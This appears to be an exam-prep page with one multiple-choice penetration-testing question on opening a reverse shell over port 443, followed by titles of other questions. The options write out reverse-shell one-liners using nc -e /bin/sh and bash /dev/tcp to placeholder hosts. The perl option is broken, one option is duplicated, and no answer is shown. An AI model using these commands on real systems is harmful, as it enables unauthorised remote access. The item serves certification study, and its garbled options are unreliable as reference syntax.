Multiple Choice
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A) perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
B) ssh superadmin@<DESTINATIONIP> -p 443
C) nc -e /bin/sh <SOURCEIP> 443 nc -e /bin/sh <SOURCEIP> 443
D) bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Correct Answer:

Verified
Correct Answer:
Verified
Q155: A penetration tester successfully exploits a DMZ
Q156: The following command is run on a
Q157: A penetration tester discovers an anonymous FTP
Q158: Which of the following BEST describes some
Q159: A penetration tester has been asked to
Q160: A penetration tester successfully exploits a system,
Q162: During a web application assessment, a penetration
Q163: A penetration tester is testing a banking
Q164: A penetration tester identifies the following findings
Q165: A penetration tester has performed a security